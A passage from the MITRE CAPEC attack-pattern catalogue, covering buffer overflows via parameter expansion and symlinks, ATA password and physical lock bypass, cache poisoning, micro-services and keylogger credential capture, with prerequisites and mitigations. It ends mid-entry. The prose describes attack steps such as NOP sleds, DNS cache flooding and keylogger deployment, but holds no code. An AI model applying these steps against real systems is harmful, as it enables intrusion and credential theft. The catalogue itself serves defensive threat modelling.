Craft overflow content: The adversary crafts the input to be given to the program. If the intent is to simply cause the software to crash, the input needs only to expand to an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft input that expands in a way that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries' choosing which points to code injected by the adversary.
Techniques
Create specific files and directories on the system and then give input using path traversal shortcuts to those directories that could expand past an input buffer.

Exploit

Overflow the buffer: Using the injection vector, the adversary gives the crafted input to the program, overflowing the buffer.

Prerequisites

The program expands one of the parameters passed to a function with input controlled by the user, but a later function making use of the expanded parameter erroneously considers the original, not the expanded size of the parameter.

The expanded parameter is used in the context where buffer overflow may become possible due to the incorrect understanding of the parameter size (i.e. thinking that it is smaller than it really is).

Skills Required

[Level: High]

Finding this particular buffer overflow may not be trivial. Also, stack and especially heap based buffer overflows require a lot of knowledge if the intended goal is arbitrary code execution. Not only that the adversary needs to write the shell code to accomplish their goals, but the adversary also needs to find a way to get the program execution to jump to the planted shell code. There also needs to be sufficient room for the payload. So not every buffer overflow will be exploitable, even by a skilled adversary.

Resources Required

Access to the program source or binary. If the program is only available in binary then a disassembler and other reverse engineering tools will be helpful.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges
Availability	Unreliable Execution
Integrity	Modify Data
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality	Read Data

Mitigations

Ensure that when parameter expansion happens in the code that the assumptions used to determine the resulting size of the parameter are accurate and that the new size of the parameter is visible to the whole system

Example Instances

Attack Example: FTP glob()

The glob() function in FTP servers has been susceptible to attack as a result of incorrect resizing. This is an ftpd glob() Expansion LIST Heap Overflow Vulnerability. ftp daemon contains a heap-based buffer overflow condition. The overflow occurs when the LIST command is issued with an argument that expands into an oversized string after being processed by glob().

This buffer overflow occurs in memory that is dynamically allocated. It may be possible for adversaries to exploit this vulnerability and execute arbitrary code on the affected host.

To exploit this, the adversary must be able to create directories on the target host.

The glob() function is used to expand short-hand notation into complete file names. By sending to the FTP server a request containing a tilde (~) and other wildcard characters in the pathname string, a remote adversary can overflow a buffer and execute arbitrary code on the FTP server to gain root privileges. Once the request is processed, the glob() function expands the user input, which could exceed the expected length. In order to exploit this vulnerability, the adversary must be able to create directories on the FTP server.

[REF-1]

CAPEC-45: Buffer Overflow via Symbolic Links

Attack Pattern ID: 45

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	100	Overflow Buffers

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Identify target application: The adversary identifies a target application or program that might load in certain files to memory.

Experiment

Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

Techniques
The adversary creates or modifies a symbolic link pointing to those files which contain an excessive amount of data. If creating a symbolic link to one of those files causes different behavior in the application, then an injection vector has been identified.

Craft overflow file content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

Techniques
Create malicious shellcode that will execute when the program execution is returned to it.
Use a NOP-sled in the overflow content to more easily "slide" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

Overflow the buffer: Using the specially crafted file content, the adversary creates a symbolic link from the identified resource to the malicious file, causing a targeted buffer overflow attack.

Prerequisites

The adversary can create symbolic link on the target host.

The target host does not perform correct boundary checking while consuming data from a resources.

Skills Required

[Level: Low]

An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS.

[Level: High]

Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.

Indicators

An adversary creating or modifying Symbolic links is a potential signal of attack in progress.

An adversary deleting temporary files can also be a sign that the adversary is trying to replace legitimate resources with malicious ones.

Consequences

Scope	Impact	Likelihood
Availability	Unreliable Execution
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality	Read Data
Integrity	Modify Data

Mitigations

Pay attention to the fact that the resource you read from can be a replaced by a Symbolic link. You can do a Symlink check before reading the file and decide that this is not a legitimate way of accessing the resource.

Because Symlink can be modified by an adversary, make sure that the ones you read are located in protected directories.

Pay attention to the resource pointed to by your symlink links (See attack pattern named "Forced Symlink race"), they can be replaced by malicious resources.

Always check the size of the input data before copying to a buffer.

Use a language or compiler that performs automatic bounds checking.

Use an abstraction library to abstract away risky APIs. Not a complete solution.

Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.

Use OS-level preventative functionality. Not a complete solution.

Example Instances

The EFTP server has a buffer overflow that can be exploited if an adversary uploads a .lnk (link) file that contains more than 1,744 bytes. This is a classic example of an indirect buffer overflow. First the adversary uploads some content (the link file) and then the adversary causes the client consuming the data to be exploited. In this example, the ls command is exploited to compromise the server software.

Related Weaknesses

CWE-ID	Weakness Name
120	Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
285	Improper Authorization
302	Authentication Bypass by Assumed-Immutable Data
118	Incorrect Access of Indexable Resource ('Range Error')
119	Improper Restriction of Operations within the Bounds of a Memory Buffer
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
20	Improper Input Validation
680	Integer Overflow to Buffer Overflow
697	Incorrect Comparison

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Example_Instances, Indicators, Mitigations, Prerequisites, Skills_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-402: Bypassing ATA Password Security

Attack Pattern ID: 402

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	401	Physically Hacking Hardware

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Supply Chain, Physical Security
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Sustainment

Prerequisites

Access to the system containing the ATA Drive so that the drive can be physically removed from the system.

Mitigations

Avoid using ATA password security when possible.

Use full disk encryption to protect the entire contents of the drive or sensitive partitions on the drive.

Leverage third-party utilities that interface with self-encrypting drives (SEDs) to provide authentication, while relying on the SED itself for data encryption.

Example Instances

The A-FF Repair Station tool is a data recovery utility that can be used for ATA password removal (both High and Maximum level) and firmware area recovery. An adversary with access to this tool could reset the ATA password to bypass this security feature and unlock the hard drive. The adversary could then obtain any data contained within the drive. [REF-702]

An adversary gains physical access to the targeted hard drive and installs it into a system that does not support ATA security features. Once the drive is installed in the feature-lacking system, the adversary is able to reset the hard drive password via the BIOS. As a result, the adversary is able to bypass ATA password security and access content on the drive.

Related Weaknesses

CWE-ID	Weakness Name
285	Improper Authorization

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 9: Hacking Hardware. 6th Edition. McGraw Hill. 2009.

[REF-701] Oliver Tennert. "Using the ATA security features of modern hard disks and SSDs". Admin Magazine. 2014. <https://www.admin-magazine.com/Archive/2014/19/Using-the-ATA-security-features-of-modern-hard-disks-and-SSDs>. URL validated: 2022-02-16.

[REF-702] "Breaking ATA Password Security". The University of Texas at Austin Information Security Office. <https://security.utexas.edu/education-outreach/BreakingATA>. URL validated: 2022-02-16.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Example_Instances, Mitigations, References

CAPEC-395: Bypassing Electronic Locks and Access Controls

Attack Pattern ID: 395

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	390	Bypassing Physical Security
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	397	Cloning Magnetic Strip Cards
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	398	Magnetic Strip Card Brute Force Attacks
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	399	Cloning RFID Cards or Chips
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	400	RFID Chip Deactivation or Destruction
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	626	Smudge Attack

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Physical Security
Mechanisms of Attack	Subvert Access Control

Related Weaknesses

Physical Security: The term "Physical Security" is used by both CAPEC and CWE, but has different definitions in each corpus. CAPEC uses this term to discuss physical access to buildings and/or specific rooms. In contrast, CWE typically uses this term to discuss physical access to hardware components. CWE does not cover "Physical Security" in the essence described by this CAPEC, so there is no mapping between to the two corpuses at this time.

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 9: Hacking Hardware. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)

CAPEC-140: Bypassing of Intermediate Forms in Multiple-Form Sets

Attack Pattern ID: 140

Abstraction: Standard

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	74	Manipulating State

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Timing and State

Prerequisites

The target must collect information from the user in a series of forms where each form has its own URL that the attacker can anticipate and the application must fail to detect attempts to access intermediate forms without first filling out the previous forms.

Resources Required

None: No specialized resources are required to execute this type of attack.

Related Weaknesses

CWE-ID	Weakness Name
372	Incomplete Internal State Distinction

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns

CAPEC-391: Bypassing Physical Locks

Attack Pattern ID: 391

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	390	Bypassing Physical Security
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	392	Lock Bumping
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	393	Lock Picking
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	394	Using a Snap Gun Lock to Force a Lock

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Physical Security
Mechanisms of Attack	Subvert Access Control

Related Weaknesses

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 9: Hacking Hardware. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction

CAPEC-390: Bypassing Physical Security

Attack Pattern ID: 390

Abstraction: Meta

View customized information:

Description

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	391	Bypassing Physical Locks
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	395	Bypassing Electronic Locks and Access Controls
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	665	Exploitation of Thunderbolt Protection Flaws

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Physical Security
Mechanisms of Attack	Subvert Access Control

Related Weaknesses

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 9: Hacking Hardware. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)

CAPEC-141: Cache Poisoning

Attack Pattern ID: 141

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	161	Infrastructure Manipulation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	142	DNS Cache Poisoning
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	33	HTTP Request Smuggling
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	34	HTTP Response Splitting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	105	HTTP Request Splitting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	273	HTTP Response Smuggling
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	663	Exploitation of Transient Instruction Execution

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Execution Flow

Explore

Identify and explore caches: Use tools to sniff traffic and scan a network in order to locate application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache) that may have vulnerabilities. Look for poisoning point in cache table entries.
Techniques
Run tools that check available entries in the cache.

Experiment

Cause specific data to be cached: An attacker sends bogus request to the target, and then floods responses that trick a cache to remember malicious responses, which are wrong answers of queries.
Techniques
Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID).

Exploit

Redirect users to malicious website: As the attacker succeeds in exploiting the vulnerability, they are able to manipulate and interpose malicious response data to targeted victim queries.

Techniques
Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID).
Adversary-in-the-Middle attacks (CAPEC-94) intercept secure communication between two parties.

Prerequisites

The attacker must be able to modify the value stored in a cache to match a desired value.

The targeted application must not be able to detect the illicit modification of the cache and must trust the cache value in its calculations.

Skills Required

[Level: Medium]

To overwrite/modify targeted cache

Mitigations

Configuration: Disable client side caching.

Implementation: Listens for query replies on a network, and sends a notification via email when an entry changes.

Example Instances

In this example, an attacker sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.

Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the attacker floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com

When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack.

Related Weaknesses

CWE-ID	Weakness Name
348	Use of Less Trusted Source
345	Insufficient Verification of Data Authenticity
349	Acceptance of Extraneous Untrusted Data With Trusted Data
346	Origin Validation Error

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1557.002	Adversary-in-the-Middle: ARP Cache Poisoning

Relevant to the OWASP taxonomy mapping

Entry Name
Cache Poisoning

References

[REF-22] "Wikipedia". DNS Cache Poisoning. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/DNS_cache_poisoning>.

[REF-23] "DNS Threats and DNS Weaknesses". DNS Threats & Weaknesses of the Domain Name System. DNSSEC. <http://www.dnssec.net/dns-threats.php>.

[REF-24] "Wikipedia". Arp Spoofing. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/ARP_spoofing>.

[REF-599] "OWASP Web Security Testing Guide". Testing for Browser Cache Weaknesses. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow, Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances, Related_Weaknesses, Taxonomy_Mappings

CAPEC-179: Calling Micro-Services Directly

Attack Pattern ID: 179

Abstraction: Standard

View customized information:

Description

Extended Description

However, these micro-services may not be subject to the same level of security review as other forms of content. For example, a micro-service that posts requests to a server that are turned into SQL queries may not adequately protect against SQL-injection attacks. As a result, micro-services may provide another vector for a range of attacks. It should be emphasized that the presence of micro-services does not necessarily make a site vulnerable to attack, but they do provide additional complexity to a web page and therefore may contain vulnerabilities that support other attack patterns.

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	554	Functionality Bypass

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

The target site must use micro-services that interact with the server and one or more of these micro-services must be vulnerable to some other attack pattern.

Resources Required

The attacker usually needs to be able to invoke micro-services directly in order to control the parameters that are used in their attack. The attacker may require other resources depending on the nature of the flaw in the targeted micro-service.

Related Weaknesses

Some type of access control weakness (CWE-284 or its descendants) is related to this CAPEC, probably as a prerequisite.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
Previous Entry Names
Change Date	Previous Entry Name
2015-12-07 (Version 2.8)	Discovering, querying, and finally calling micro-services, such as w/ AJAX

CAPEC-568: Capture Credentials via Keylogger

Attack Pattern ID: 568

Abstraction: Detailed

View customized information:

Description

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	569	Collect Data as Provided by Users
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	270	Modification of Registry Run Keys
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	560	Use of Known Domain Credentials
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	561	Windows Admin Shares with Stolen Credentials
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	600	Credential Stuffing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	653	Use of Known Operating System Credentials

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Determine which user's credentials to capture: Since this is a more targeted attack, an adversary will first identify a particular user they wish the capture the credentials of.

Experiment

Deploy keylogger: Once a user is identified, an adversary will deploy a keylogger to the user's system in one of many ways.

Techniques
Send a phishing email with a malicious attachment that installs a keylogger on a user's system
Conceal a keylogger behind fake software and get the user to download the software
Get a user to click on a malicious URL that directs them to a webpage that will install a keylogger without their knowledge
Gain access to the user's system through a vulnerability and manually install a keylogger

Record keystrokes: Once the keylogger is deployed on the user's system, the adversary will record keystrokes over a period of time.

Analyze data and determine credentials: Using the captured keystrokes, the adversary will be able to determine the credentials of the user.

Techniques
Search for repeated sequences that are following by the enter key
Search for repeated sequences that are not found in a dictionary
Search for several backspaces in a row. This could indicate a mistyped password. The correct password can then be inferred using the whole key sequence

Exploit

Use found credentials: After the adversary has found the credentials for the target user, they will then use them to gain access to a system in order to perform some follow-up attack

Prerequisites

The ability to install the keylogger, either in person or remote.

Mitigations

